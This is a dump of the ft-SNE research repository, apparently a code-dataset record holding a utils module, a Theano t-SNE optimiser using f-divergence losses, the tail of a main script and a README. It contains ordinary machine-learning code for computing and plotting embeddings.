lrDecay=5\n elif divtypet=='ch':\n initial_momentum=0.5\n initial_lr_tsne=100 \n momentum_switch=200\n lrDecay=100\n elif divtypet=='rkl':\n initial_momentum=0.5\n initial_lr_tsne=1000\n momentum_switch=100\n lrDecay=25\n elif divtypet=='js':\n initial_momentum=0.5\n initial_lr_tsne=3000;\n momentum_switch=200\n lrDecay=100\n else:\n initial_momentum=0.5\n initial_lr_tsne=1500\n momentum_switch=200\n lrDecay=100\n\n\n print 'Divtype %s, Perplexity %d' % (divtypet, perplexity_tsne)\n fname = args.datatype+'/'+divtypet+'/tsne_'+str(perplexity_tsne)+'perp'+str(n_epochs_tsne)+'epoch_initlr'+str(initial_lr_tsne)+pcastr\n projX = tsne(data, \n initial_lr=initial_lr_tsne, \\\n final_lr=initial_lr_tsne,\\\n lrDecay=lrDecay,\\\n initial_momentum=initial_momentum,\\\n momentum_switch=momentum_switch,\\\n perplexity=perplexity_tsne, \\\n n_epochs=n_epochs_tsne, fname=fname, \\\n color=color, divtype=divtypet, datatype=args.datatype)\n\n print(fname)\n pass\n\n\n\n" }, { "alpha_fraction": 0.5788095593452454, "alphanum_fraction": 0.595940887928009, "avg_line_length": 30.493127822875977, "blob_id": "5aa44f5a73f22ed2cbef7c17976d5b7c618a5c07", "content_id": "b8caa1cf3506224a7ed0be21b7167c8ea22a8f90", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18329, "license_type": "permissive", "max_line_length": 134, "num_lines": 582, "path": "/utils.py", "repo_name": "jiwoongim/ft-SNE", "src_encoding": "UTF-8", "text": "''' Version 1.000\n Code provided by Daniel Jiwoong Im \n Permission is granted for anyone to copy, use, modify, or distribute this\n program and accompanying programs and documents for any purpose, provided\n this copyright notice is retained and prominently displayed, along with\n a note saying that the original programs are available from our\n web page.\n The programs and documents are distributed without any warranty, express or\n implied. As the programs were written for research purposes only, they have\n not been tested to the degree that would be advisable in any important\n application. 
All use of these programs is entirely at the user's own risk.'''\n\n\nimport os, sys, cPickle, math, pylab #, PIL\nimport matplotlib as mp\nimport matplotlib.cm as cm\nimport matplotlib.pyplot as plt\n\nimport numpy as np\nfrom numpy.lib import stride_tricks\n\nimport theano\nimport theano.tensor as T\nfrom theano.tensor.shared_randomstreams import RandomStreams\nimport theano.sandbox.rng_mrg as RNG_MRG\n#from subnets.layers.utils import rng\nrng = np.random.RandomState(0)\nMRG = RNG_MRG.MRG_RandomStreams(rng.randint(2 ** 30))\n\n\ndef plot_map(xx, fname):\n\n    plt.figure()\n    ax = plt.subplot(111)\n\n    area = np.pi \n    colors = cm.rainbow(np.linspace(0, 1, len(xx)))\n    for i, x in enumerate(xx):\n        plt.scatter(x[:,0], x[:,1], s=area, c=colors[i, :], alpha=0.8, cmap=plt.cm.Spectral, \\\n                                    facecolor='0.5', lw = 0)\n\n    box = ax.get_position()\n    ax.set_position([box.x0, box.y0, box.width * 1., box.height])\n    ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.1),\n                      fancybox=True, shadow=True, ncol=3)\n\n    plt.savefig(fname, bbox_inches='tight', format='pdf')\n\n\ndef divide_by_labels(xx, yy, num_class=10):\n\n    xx_list = []\n    for i in xrange(num_class):\n\n        indice = np.argwhere(yy==i).flatten()\n        xx_list.append(xx[indice])\n\n    return xx_list\n\n\ndef prob_K_per(prob, Ks):\n\n    N = prob.shape[0]\n    sorted_prob_ind = np.argsort(prob, axis=1)[:,::-1]\n\n    probKs = []\n    for k in Ks:\n        # for each row, take the probability at its k-th largest index\n        probK = prob[np.arange(N), sorted_prob_ind[:,k]]\n        probKs.append([np.mean(probK, axis=0), np.std(probK, axis=0)])\n\n    probKs = np.asarray(probKs)\n    return probKs\n\n\ndef uncompress_sparseMatrix(matrice):\n\n    data = []; labels = []\n    n = matrice.shape[0]\n    for i in xrange(n):\n        data.append(matrice[i][0].todense())\n        labels.append(np.ones(matrice[i][0].shape[0]) * i)\n    data = np.vstack(data).astype('float32')\n    perm = rng.permutation(data.shape[0])\n    labels = np.hstack(labels)\n\n    return data[perm], labels[perm]\n\ndef floatX(X):\n    return np.asarray(X, dtype=theano.config.floatX)\n\n\n\ndef conv_cond_concat(x, y):\n    \"\"\" \n    concatenate conditioning vector on feature map axis \n    \"\"\"\n    return T.concatenate([x, y*T.ones((x.shape[0], y.shape[1], x.shape[2], x.shape[3]))], axis=1)\n\n\ndef init_conv_weights(W_low, W_high, filter_shape, numpy_rng, rng_dist='normal'):\n    \"\"\"\n    initializes the convnet weights.\n    \"\"\"\n\n    if 'uniform' in rng_dist:\n        return np.asarray(\n            numpy_rng.uniform(low=W_low, high=W_high, size=filter_shape),\n            dtype=theano.config.floatX)\n    elif rng_dist == 'normal':\n        return 0.01 * numpy_rng.normal(size=filter_shape).astype(theano.config.floatX)\n\n\ndef initialize_weight(n_vis, n_hid, W_name, numpy_rng, rng_dist):\n    \"\"\"\n    \"\"\"\n\n    if 'uniform' in rng_dist:\n        W = numpy_rng.uniform(low=-np.sqrt(6. / (n_vis + n_hid)),\\\n                high=np.sqrt(6. 
/ (n_vis + n_hid)),\n size=(n_vis, n_hid)).astype(theano.config.floatX)\n elif rng_dist == 'normal':\n W = 0.01 * numpy_rng.normal(size=(n_vis, n_hid)).astype(theano.config.floatX)\n elif rng_dist == 'ortho': ### Note that this only works for square matrices\n N_ = int(n_vis / float(n_hid))\n sz = np.minimum(n_vis, n_hid)\n W = np.zeros((n_vis, n_hid), dtype=theano.config.floatX)\n for i in xrange(N_):\n temp = 0.01 * numpy_rng.normal(size=(sz, sz)).astype(theano.config.floatX)\n W[:, i*sz:(i+1)*sz] = sp.linalg.orth(temp)\n\n\n return theano.shared(value = np.cast[theano.config.floatX](W), name=W_name)\n\n\n\ndef init_uniform(shape, rng, scale=0.05, name='W'):\n\n return theano.shared(rng.uniform(low=-scale, high=scale, size=shape).astype('float32'), name=name)\n\n\n'''Initialize the bias'''\ndef initialize_bias(n, b_name):\n\n return theano.shared(value = np.cast[theano.config.floatX](np.zeros((n,)), \\\n dtype=theano.config.floatX), name=b_name)\n\n\ndef init_zero(shape, dtype=theano.config.floatX, name=None):\n return theano.shared(np.zeros(shape, dtype='float32'), name=name)\n\n\n'''Convolve Gaussian filters'''\ndef convolve2D(F1,F2, Z): \n\n Fz = (F1.dimshuffle([0,1,2,'x']) * Z.dimshuffle([0,'x',1,2])).sum(axis=-2)\n FzF = (Fz.dimshuffle([0,1,2,'x']) * F2.dimshuffle([0,'x',1,2])).sum(axis=-2)\n\n return FzF\n\n\n\ndef unpickle(path):\n ''' For cifar-10 data, it will return dictionary'''\n #Load the cifar 10\n f = open(path, 'rb')\n data = cPickle.load(f)\n f.close()\n return data \n\n\ndef share_input(x):\n return theano.shared(np.asarray(x, dtype=theano.config.floatX))\n\n\ndef shared_dataset(data_xy):\n \"\"\" Function that loads the dataset into shared variables\n\n The reason we store our dataset in shared variables is to allow\n Theano to copy it into the GPU memory (when code is run on GPU).\n Since copying data into the GPU is slow, copying a minibatch everytime\n is needed (the default behaviour if the data is not in a shared\n variable) would lead to a large decrease in performance.\n \"\"\"\n\n data_x, data_y = data_xy\n shared_x = theano.shared(np.asarray(data_x, dtype=theano.config.floatX))\n shared_y = theano.shared(np.asarray(data_y, dtype=theano.config.floatX))\n #When storing data on the GPU it has to be stored as floats\n # therefore we will store the labels as ``floatX`` as well\n # (``shared_y`` does exactly that). But during our computations\n # we need them as ints (we use labels as index, and if they are\n # floats it doesn't make sense) therefore instead of returning\n # ``shared_y`` we will have to cast it to int. 
This little hack\n # lets us get around this issue\n\n return shared_x, T.cast(shared_y, 'int32')\n\n\ndef repmat_tensor(x,k):\n\n return T.tile(x.dimshuffle([0,1, 2,'x']), [1,1,1,k])\n\n\ndef repmat_vec(x,k):\n\n return T.tile(x.dimshuffle([0,'x']), [1,k]).T\n\n\ndef activation_fn_th(X,atype='sigmoid', leak_thrd=0.2):\n '''collection of useful activation functions'''\n\n if atype == 'softmax':\n return T.nnet.softmax(X)\n elif atype == 'sigmoid':\n return T.nnet.sigmoid(X)\n elif atype == 'tanh':\n return T.tanh(X)\n elif atype == 'softplus':\n return T.nnet.softplus(X)\n elif atype == 'relu':\n return (X + abs(X)) / 2.0\n elif atype == 'linear':\n return X\n elif atype =='leaky':\n f1 = 0.5 * (1 + leak_thrd)\n f2 = 0.5 * (1 - leak_thrd)\n return f1 * X + f2 * abs(X)\n elif atype == 'elu': \n return T.switch(X > 0, X, T.expm1(X))\n elif atype =='selu':\n alpha = 1.6732632423543772848170429916717\n scale = 1.0507009873554804934193349852946\n return scale*T.where(X>=0.0, X, alpha*T.switch(X > 0, X, T.expm1(X)))\n\n\n\n\ndef save_the_weight(x,fname):\n '''save pickled weights'''\n f = file(fname+'.save', 'wb')\n cPickle.dump(x, f, protocol=cPickle.HIGHEST_PROTOCOL)\n print(\"saved!\")\n f.close()\n \n\ndef save_the_numpy_params(model,size,rank,epoch, model_path):\n \n tmp = []\n\n for param in model.gen_network.params:\n if rank==0: print param.get_value().shape\n tmp.append(param.get_value())\n\n np.save(model_path+'/%d%dgen_params_e%d.npy' % (size, rank, epoch),tmp)\n\n # comm.Barrier()\n print 'saved'\n # exit(0)\n \n\n'''Display the data.\ndata - n_dim X 3 , n_dim = dim_x * dim_y '''\ndef display_data(data, img_sz, RGB_flag=False, ):\n if RGB_flag:\n \tpic = data.reshape(img_sz[0],img_sz[1],3)\n else:\n pic = data.reshape(img_sz[0],img_sz[1])\n\n plt.figure()\n plt.imshow(pic, cmap='gray')\n\n\n'''Display dataset as a tiles'''\ndef display_dataset(data, patch_sz, tile_shape, scale_rows_to_unit_interval=False, \\\n binary=False, i=1, fname='dataset'):\n\n x = tile_raster_images(data, img_shape=patch_sz, \\\n \t\t\t\t\t\ttile_shape=tile_shape, tile_spacing=(1,1), output_pixel_vals=False, scale_rows_to_unit_interval=scale_rows_to_unit_interval)\n \n if binary:\n \tx[x==1] = 255\t\t\n\n ## For MNIST\n if fname != None:\n plt.figure()\n plt.imshow(x,cmap='gray')\n plt.axis('off')\n plt.savefig(fname+'.png', bbox_inches='tight')\n else:\n plt.figure()\n plt.imshow(x,cmap='gray')\n plt.axis('off')\n plt.show(block=True)\n \n\ndef scale_to_unit_interval(ndar, eps=1e-8):\n \"\"\" Scales all values in the ndarray ndar to be between 0 and 1 \"\"\"\n ndar = ndar.copy()\n ndar -= ndar.min()\n ndar *= 1.0 / (ndar.max() + eps)\n return ndar\n\n\ndef tile_raster_images(X, img_shape, tile_shape, tile_spacing=(0, 0),\n scale_rows_to_unit_interval=False,\n output_pixel_vals=True):\n \"\"\"\nTransform an array with one flattened image per row, into an array in\nwhich images are reshaped and layed out like tiles on a floor.\n\nThis function is useful for visualizing datasets whose rows are images,\nand also columns of matrices for transforming those rows\n(such as the first layer of a neural net).\n\n:type X: a 2-D ndarray or a tuple of 4 channels, elements of which can\nbe 2-D ndarrays or None;\n:param X: a 2-D array in which every row is a flattened image.\n\n:type img_shape: tuple; (height, width)\n:param img_shape: the original shape of each image\n\n:type tile_shape: tuple; (rows, cols)\n:param tile_shape: the number of images to tile (rows, cols)\n\n:param output_pixel_vals: if output should be pixel 
values (i.e. int8\nvalues) or floats\n\n:param scale_rows_to_unit_interval: if the values need to be scaled before\nbeing plotted to [0,1] or not\n\n\n:returns: array suitable for viewing as an image.\n(See:`PIL.Image.fromarray`.)\n:rtype: a 2-d array with same dtype as X.\n\n\"\"\"\n\n assert len(img_shape) == 2\n assert len(tile_shape) == 2\n assert len(tile_spacing) == 2\n\n # The expression below can be re-written in a more C style as\n # follows :\n #\n # out_shape = [0,0]\n # out_shape[0] = (img_shape[0]+tile_spacing[0])*tile_shape[0] -\n # tile_spacing[0]\n # out_shape[1] = (img_shape[1]+tile_spacing[1])*tile_shape[1] -\n # tile_spacing[1]\n out_shape = [(ishp + tsp) * tshp - tsp for ishp, tshp, tsp\n in zip(img_shape, tile_shape, tile_spacing)]\n\n if isinstance(X, tuple):\n assert len(X) == 4\n # Create an output numpy ndarray to store the image\n if output_pixel_vals:\n out_array = np.zeros((out_shape[0], out_shape[1], 4),\n dtype='uint8')\n else:\n out_array = np.zeros((out_shape[0], out_shape[1], 4),\n dtype=X[0].dtype)\n\n #colors default to 0, alpha defaults to 1 (opaque)\n if output_pixel_vals:\n channel_defaults = [0, 0, 0, 255]\n else:\n channel_defaults = [0., 0., 0., 1.]\n\n for i in xrange(4):\n if X[i] is None:\n # if channel is None, fill it with zeros of the correct\n # dtype\n dt = out_array.dtype\n if output_pixel_vals:\n dt = 'uint8'\n out_array[:, :, i] = np.zeros(out_shape,\n dtype=dt) + channel_defaults[i]\n else:\n # use a recurrent call to compute the channel and store it\n # in the output\n out_array[:, :, i] = tile_raster_images(\n X[i], img_shape, tile_shape, tile_spacing,\n scale_rows_to_unit_interval, output_pixel_vals)\n return out_array\n\n else:\n # if we are dealing with only one channel\n H, W = img_shape\n Hs, Ws = tile_spacing\n\n # generate a matrix to store the output\n dt = X.dtype\n if output_pixel_vals:\n dt = 'uint8'\n out_array = np.zeros(out_shape, dtype=dt)\n\n for tile_row in xrange(tile_shape[0]):\n for tile_col in xrange(tile_shape[1]):\n\t\t#print tile_row, tile_shape[1], tile_col, X.shape[0]\n\t\t#print tile_row * tile_shape[1] + tile_col < X.shape[0]\n if tile_row * tile_shape[1] + tile_col < X.shape[0]:\n this_x = X[tile_row * tile_shape[1] + tile_col]\n\t\t #print this_x\n\t\t #print scale_rows_to_unit_interval\n if scale_rows_to_unit_interval:\n # if we should scale values to be between 0 and 1\n # do this by calling the `scale_to_unit_interval`\n # function\n this_img = scale_to_unit_interval(\n this_x.reshape(img_shape))\n\t\t\t#print this_x.shape\n\t\t\t#print this_img\n else:\n this_img = this_x.reshape(img_shape)\n # add the slice to the corresponding position in the\n # output array\n\t\t\t#print this_x.shape\n\t\t\t#print this_img\n\n c = 1\n if output_pixel_vals:\n c = 255\n out_array[\n tile_row * (H + Hs): tile_row * (H + Hs) + H,\n tile_col * (W + Ws): tile_col * (W + Ws) + W\n ] = this_img * c\n return out_array\n\ndef corrupt_input(rng, input, corruption_level, ntype='gaussian'):\n\n return input + rng.normal(size = input.shape, loc = 0.0,\n scale= corruption_level)\n\n\n\ndef get_corrupted_input(rng, input, corruption_level, ntype='zeromask'):\n ''' depending on requirement, returns input corrupted by zeromask/gaussian/salt&pepper'''\n MRG = RNG_MRG.MRG_RandomStreams(rng.randint(2 ** 30))\n #theano_rng = RandomStreams()\n if corruption_level == 0.0:\n return input\n\n if ntype=='zeromask':\n return MRG.binomial(size=input.shape, n=1, p=1-corruption_level,dtype=theano.config.floatX) * input\n elif 
ntype=='gaussian':\n return input + MRG.normal(size = input.shape, avg = 0.0,\n std = corruption_level, dtype = theano.config.floatX)\n elif ntype=='salt_pepper':\n\n # salt and pepper noise\n print 'DAE uses salt and pepper noise'\n a = MRG.binomial(size=input.shape, n=1,\\\n p=1-corruption_level,dtype=theano.config.floatX)\n b = MRG.binomial(size=input.shape, n=1,\\\n p=corruption_level,dtype=theano.config.floatX)\n\n c = T.eq(a,0) * b\n return input * a + c\n\n''' improving learning rate'''\ndef get_epsilon_inc(epsilon, n, i):\n \"\"\"\n n: total num of epoch\n i: current epoch num\n \"\"\"\n return epsilon / ( 1 - i/float(n))\n\n'''decaying learning rate'''\ndef get_epsilon(epsilon, n, i):\n \"\"\"\n n: total num of epoch\n i: current epoch num\n \"\"\"\n return epsilon / ( 1 + i/float(n))\n\ndef get_epsilon_decay(i, num_epoch, constant=4): \n c = np.log(num_epoch/2)/ np.log(constant)\n return 10.**(1-(i-1)/(float(c)))\n\n\n'''Given tiles of raw data, this function will return training, validation, and test sets.\nr_train - ratio of train set\nr_valid - ratio of valid set\nr_test - ratio of test set'''\ndef gen_train_valid_test(raw_data, raw_target, r_train, r_valid, r_test):\n N = raw_data.shape[0]\n perms = np.random.permutation(N)\n raw_data = raw_data[perms,:]\n raw_target = raw_target[perms]\n\n tot = float(r_train + r_valid + r_test) #Denominator\n p_train = r_train / tot #train data ratio\n p_valid = r_valid / tot #valid data ratio\n p_test = r_test / tot\t #test data ratio\n \n n_raw = raw_data.shape[0] #total number of data\t\t\n n_train =int( math.floor(n_raw * p_train)) # number of train\n n_valid =int( math.floor(n_raw * p_valid)) # number of valid\n n_test =int( math.floor(n_raw * p_test) ) # number of test\n\n \n train = raw_data[0:n_train, :]\n valid = raw_data[n_train:n_train+n_valid, :]\n test = raw_data[n_train+n_valid: n_train+n_valid+n_test,:]\n \n train_target = raw_target[0:n_train]\n valid_target = raw_target[n_train:n_train+n_valid]\n test_target = raw_target[n_train+n_valid: n_train+n_valid+n_test]\n \n print 'Among ', n_raw, 'raw data, we generated: '\n print train.shape[0], ' training data'\n print valid.shape[0], ' validation data'\n print test.shape[0], ' test data\\n'\n \n train_set = [train, train_target]\n valid_set = [valid, valid_target]\n test_set = [test, test_target]\n return [train_set, valid_set, test_set]\n\n\ndef dist2hy(x,y):\n '''Distance matrix computation\n Hybrid of the two, switches based on dimensionality\n '''\n\n d = T.dot(x,y.T)\n d *= -2.0\n d += T.sum(x*x, axis=1).dimshuffle(0,'x')\n d += T.sum(y*y, axis=1)\n\n # Rounding errors occasionally cause negative entries in d\n d = d * T.cast(d>0,theano.config.floatX)\n\n return d\n\n\ndef dist2hy_np(x,y):\n '''Distance matrix computation\n Hybrid of the two, switches based on dimensionality\n '''\n\n d = np.dot(x,y.T)\n d *= -2.0\n d += np.sum(x*x, axis=1)[:,None]\n d += np.sum(y*y, axis=1)\n\n # Rounding errors occasionally cause negative entries in d\n d = d * np.asarray(d>0,'float32')\n\n return np.sqrt(d)\n\n\ndef save_the_env(dir_to_save, path):\n \n import fnmatch\n import os\n\n matches = []\n for root, dirnames, filenames in os.walk(dir_to_save):\n for extension in ('*.py', '*.sh'):\n for filename in fnmatch.filter(filenames, extension):\n matches.append(os.path.join(root, filename))\n \n # print matches\n \n # print 'creating archive'\n import tarfile\n out = tarfile.open('env.tar', mode='w')\n \n try:\n # print 'adding files into tar'\n for f in matches:\n out.add(f)\n except 
Exception as e:\n raise e\n\n # print 'closing'\n out.close()\n \n import shutil\n tar_to_save = 'env.tar'\n \n shutil.copy2(tar_to_save, path)\n" }, { "alpha_fraction": 0.5916301012039185, "alphanum_fraction": 0.602429986000061, "avg_line_length": 39.390907287597656, "blob_id": "ddc2fbbf9a024acb7815af8a9cd2027bd0fc2246", "content_id": "4f19add697e25f209302262af8dcb1ff75b6eb3e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8889, "license_type": "permissive", "max_line_length": 99, "num_lines": 220, "path": "/tsne.py", "repo_name": "jiwoongim/ft-SNE", "src_encoding": "UTF-8", "text": "\"\"\"\nCode taken from https://github.com/hma02/thesne/blob/master/model/tsne.py\nAnd then modified.\n\"\"\"\nimport os, sys\nimport numpy as np\nimport theano\nimport theano.tensor as T\n\nfrom sklearn.utils import check_random_state\n\nfrom core import kl_cost_var, reverse_kl_cost_var, js_cost_var, \\\n hellinger_cost_var, chi_square_cost_var, \\\n p_Yp_Y_var_np, floath, find_sigma\n\nfrom utils import get_epsilon\nfrom utils_sne import precision_K, K_neighbours, neighbour_accuracy_K, plot_map_c, plot_map_news\n\n\ndef tsne(X, perplexity=30, Y=None, output_dims=2, n_epochs=1000,\n initial_lr=1000, final_lr=50, lr_switch=250, init_stdev=1e-3,\n sigma_iters=50, initial_momentum=0.95, final_momentum=0.0, lrDecay=100,\\\n momentum_switch=250, metric='euclidean', random_state=None,\n verbose=1, fname=None, color=None, divtype='kl', num_folds=2, datatype='mnist'):\n \"\"\"Compute projection from a matrix of observations (or distances) using \n t-SNE.\n \n Parameters\n ----------\n X : array-like, shape (n_observations, n_features), \\\n or (n_observations, n_observations) if `metric` == 'precomputed'.\n Matrix containing the observations (one per row). 
If `metric` is \n 'precomputed', pairwise dissimilarity (distance) matrix.\n \n perplexity : float, optional (default = 30)\n Target perplexity for binary search for sigmas.\n \n Y : array-like, shape (n_observations, output_dims), optional \\\n (default = None)\n Matrix containing the starting position for each point.\n \n output_dims : int, optional (default = 2)\n Target dimension.\n \n n_epochs : int, optional (default = 1000)\n Number of gradient descent iterations.\n \n initial_lr : float, optional (default = 2400)\n The initial learning rate for gradient descent.\n \n final_lr : float, optional (default = 200)\n The final learning rate for gradient descent.\n \n lr_switch : int, optional (default = 250)\n Iteration in which the learning rate changes from initial to final.\n This option effectively subsumes early exaggeration.\n \n init_stdev : float, optional (default = 1e-4)\n Standard deviation for a Gaussian distribution with zero mean from\n which the initial coordinates are sampled.\n \n sigma_iters : int, optional (default = 50)\n Number of binary search iterations for target perplexity.\n \n initial_momentum : float, optional (default = 0.5)\n The initial momentum for gradient descent.\n \n final_momentum : float, optional (default = 0.8)\n The final momentum for gradient descent.\n \n momentum_switch : int, optional (default = 250)\n Iteration in which the momentum changes from initial to final.\n \n metric : 'euclidean' or 'precomputed', optional (default = 'euclidean')\n Indicates whether `X` is composed of observations ('euclidean') \n or distances ('precomputed').\n \n random_state : int or np.RandomState, optional (default = None)\n Integer seed or np.RandomState object used to initialize the\n position of each point. Defaults to a random seed.\n\n verbose : bool (default = 1)\n Indicates whether progress information should be sent to standard \n output.\n \n Returns\n -------\n Y : array-like, shape (n_observations, output_dims)\n Matrix representing the projection. 
Each row (point) corresponds to a\n row (observation or distance to other observations) in the input matrix.\n \"\"\"\n \n N = X.shape[0]\n X_shared = theano.shared(np.asarray(X, dtype=floath))\n sigma_shared = theano.shared(np.ones(N, dtype=floath))\n find_sigma(X_shared, sigma_shared, N, perplexity, sigma_iters, metric, verbose)\n\n sorted_ind_p, pdist = K_neighbours(X, sigma=sigma_shared.get_value(), maxK=10)\n rev_sorted_ind_p, pdist = K_neighbours(X, maxK=100, revF=True, sigma=sigma_shared.get_value())\n\n figs_path = './figs/'+datatype+'/'+divtype\n result_path = './results/'+datatype+'/'+divtype\n embedd_path = './embeddings/'+datatype+'/'+divtype\n if not os.path.exists(figs_path): os.makedirs(figs_path)\n if not os.path.exists(result_path): os.makedirs(result_path)\n if not os.path.exists(embedd_path): os.makedirs(embedd_path)\n np.save(result_path+'/'+datatype+'_probM_seed0_v2_perp'+str(perplexity), pdist)\n np.save(result_path+'/'+datatype+'_data_sorted_v2_seed0_perp'+str(perplexity), sorted_ind_p)\n\n for i in xrange(1,num_folds):\n print '%s FOLD %d' % (divtype, i)\n random_state = check_random_state(i)\n\n Y = random_state.normal(0, init_stdev, size=(N, output_dims))\n Y_shared = theano.shared(np.asarray(Y, dtype=floath))\n\n Y = find_Y(X_shared, Y_shared, sigma_shared, N, output_dims, \\\n n_epochs, initial_lr, final_lr, lr_switch, \\\n init_stdev, initial_momentum, final_momentum, \\\n momentum_switch, metric, sorted_ind_p, \\\n rev_sorted_ind_p, verbose, \\\n fname=fname+'_fold'+str(i), color=color, \\\n divtype=divtype, lrDecay=lrDecay, \\\n datatype=datatype)\n\n return Y\n\n\ndef find_Y(X_shared, Y_shared, sigma_shared, N, output_dims, n_epochs,\n initial_lr, final_lr, lr_switch, init_stdev, initial_momentum,\n final_momentum, momentum_switch, metric, sorted_ind_p, rev_sorted_ind_p,\\\n verbose=0, fname=None, color=None, divtype='kl', lrDecay=100,\\\n visLossF=0, naccuracyF=1, datatype='mnist'):\n\n \"\"\"Optimize cost wrt Y\"\"\"\n # Optimization hyperparameters\n initial_lr = np.array(initial_lr, dtype=floath)\n final_lr = np.array(final_lr, dtype=floath)\n initial_momentum = np.array(initial_momentum, dtype=floath)\n final_momentum = np.array(final_momentum, dtype=floath)\n\n lr = T.fscalar('lr')\n lr_shared = theano.shared(initial_lr)\n\n\n X = T.fmatrix('X')\n Y = T.fmatrix('Y')\n Yv = T.fmatrix('Yv')\n Yv_shared = theano.shared(np.zeros((N, output_dims), dtype=floath))\n\n sigma = T.fvector('sigma')\n momentum = T.fscalar('momentum')\n momentum_shared = theano.shared(initial_momentum)\n\n # Cost\n if divtype == 'kl':\n cost = kl_cost_var(X, Y, sigma, metric)\n elif divtype == 'rkl':\n cost = reverse_kl_cost_var(X, Y, sigma, metric)\n elif divtype == 'js':\n cost = js_cost_var(X, Y, sigma, metric)\n elif divtype == 'hl':\n cost = hellinger_cost_var(X, Y, sigma, metric)\n elif divtype == 'ch':\n cost = chi_square_cost_var(X, Y, sigma, metric)\n\n # Setting update for Y velocities\n grad_Y = T.grad(cost, Y)\n norm_gs = abs(grad_Y).sum()\n updates = [(Yv_shared, momentum*Yv - lr*grad_Y)]\n givens = {X: X_shared, sigma: sigma_shared, Y: Y_shared, Yv: Yv_shared}\n update_Yv = theano.function([lr, momentum], [cost, norm_gs], givens=givens, updates=updates)\n Y_len = T.mean(T.sum(Y**2, axis=1))\n\n # Setting update for Y\n get_y_i = theano.function([], Y, givens={Y: Y_shared})\n get_cost_i = theano.function([Y], cost, givens={X: X_shared, sigma: sigma_shared})\n givens = {Y: Y_shared, Yv: Yv_shared}\n updates = [(Y_shared, Y + Yv)]\n update_Y = theano.function([], Y_len, 
givens=givens, updates=updates)\n\n    loss, gnorms = [], []\n    for epoch in range(n_epochs):\n\n        lrY = max(float(get_epsilon(initial_lr, lrDecay, epoch)), min(0.001, initial_lr))\n        mom = float(get_epsilon(initial_momentum, lrDecay, epoch)) \\\n                                if epoch < momentum_switch else 0.85\n\n        c, grad_len = update_Yv(lrY, mom)\n        gnorms.append(grad_len)\n        y_len = update_Y()\n        loss.append(c)\n\n        if verbose:\n            projX = np.array(Y_shared.get_value())\n            if epoch % 25 == 0 or epoch < 20:\n                np.save('./embeddings/'+fname, projX)\n\n                ffname = './figs/'+fname+'_epoch'+str(epoch)+'.pdf'\n                if datatype == 'sbow':\n                    color_dict = [\\\n                        'lightblue', 'darkblue', \n                        'indianred', 'darkred', 'red', 'magenta', 'hotpink',\n                        'silver', 'darkgray', 'gray']\n\n\n                    plot_map_news(projX, color, color_dict, ffname)\n                else:\n                    plot_map_c(projX, color, ffname)\n\n\n            print 'Epoch %d, SNE J %f, |GS| %f, |Y| %f, LRY %f, MOM %f' \\\n                    % (epoch, c, grad_len, y_len, lrY, mom)\n\n\n    np.save('./results/'+fname+'_loss', np.asarray(loss))\n    np.save('./results/'+fname+'_gnorm', np.asarray(gnorms))\n\n    return np.array(Y_shared.get_value())\n\n\n\n" }, { "alpha_fraction": 0.7061403393745422, "alphanum_fraction": 0.7373294234275818, "avg_line_length": 37.660377502441406, "blob_id": "36c5fa180916c34f44a78cf8e615a1e82b0e958b", "content_id": "d6baef87b0f062a761312090eaa4dcc16237a739", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2052, "license_type": "permissive", "max_line_length": 108, "num_lines": 53, "path": "/README.md", "repo_name": "jiwoongim/ft-SNE", "src_encoding": "UTF-8", "text": "# Stochastic Neighbour Embedding under f-divergence \n\nPython (Theano) implementation of Stochastic Neighbour Embedding under f-divergence, code provided \nby Daniel Jiwoong Im, Nakul Verma, Kristin Branson \n\nft-Stochastic Neighbour Embedding (ft-SNE) is an f-divergence-based loss criterion for t-SNE.\nThe main idea is that different f-divergences produce better low-dimensional visualizations \nfor different types of structure in data.\n\nFor more information, see \n```bibtex\n@article{Im2018,\n    title={Stochastic Neighbour Embedding under f-divergence},\n    author={Im, Daniel Jiwoong and Verma, Nakul and Branson, Kristin},\n    year={2018}\n}\n```\nIf you use this in your research, we kindly ask that you cite the above arxiv paper.\n\n\n## Dependencies\nPackages\n* [numpy](http://www.numpy.org/)\n* [matplotlib](https://matplotlib.org/)\n* [sklearn](http://scikit-learn.org/stable/install.html/)\n* [Theano ('0.9.0.dev-c697eeab84e5b8a74908da654b66ec9eca4f1291')](http://deeplearning.net/software/theano/) \n\n\n## How to run\nEntry code for MNIST, MNIST1, FACE, NEWS\n```\n   python ./main.py --datatype mnist --divtypet kl --perplexity 100\n   python ./main.py --datatype mnist1 --divtypet rkl --perplexity 100\n   python ./main.py --datatype face --divtypet rkl --perplexity 100\n   python ./main.py --datatype news --divtypet kl --perplexity 100\n```\nEntry code for running your own data:\n```\n   python ./run.py --divtypet kl --perplexity 100 --dataset_path [YOUR OWN DATADIR]\n```\nNote that the data and label files must be NumPy array \n(npy) files: the data file should be data.npy (an NxD matrix) and the label file label.npy (an Nx1 array),\nwhere N is the number of data points and D is the number of features (see line 44-45 in run.py for details).\n\n\n\n## Illustration \nft-SNE embeddings obtained with interpolated divergences \nbetween KL and RKL. 
The perplexity for each row corresponds to 10, 100, and 500, respectively:\n\n![Image of cluster embedding](https://github.com/jiwoongim/ft-SNE/blob/master/blob_cropped.jpg)\n\n![Image of manifold embedding](https://github.com/jiwoongim/ft-SNE/blob/master/swiss_cropped.jpg)\n\n\n\n" } ]
7
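The core.py file in the ft-SNE record above builds its divergence losses symbolically in Theano; the two central ones are easy to check numerically. Below is a NumPy sketch, assuming `P` and `Q` are row-stochastic neighbour matrices such as those returned by `p_Xp_given_X_np` and `p_Yp_Y_var_np`, with the same `epsilon` clamp the Theano code uses:

```python
import numpy as np

EPSILON = 1e-6  # mirrors `epsilon` in core.py

def kl(P, Q):
    # KL(P || Q): penalises Q for missing neighbourhoods that P has.
    Pc, Qc = np.maximum(P, EPSILON), np.maximum(Q, EPSILON)
    return np.mean(np.sum(P * np.log(Pc / Qc), axis=-1))

def reverse_kl(P, Q):
    # KL(Q || P): penalises Q for inventing neighbourhoods that P lacks.
    Pc, Qc = np.maximum(P, EPSILON), np.maximum(Q, EPSILON)
    return np.mean(np.sum(Q * np.log(Qc / Pc), axis=-1))
```

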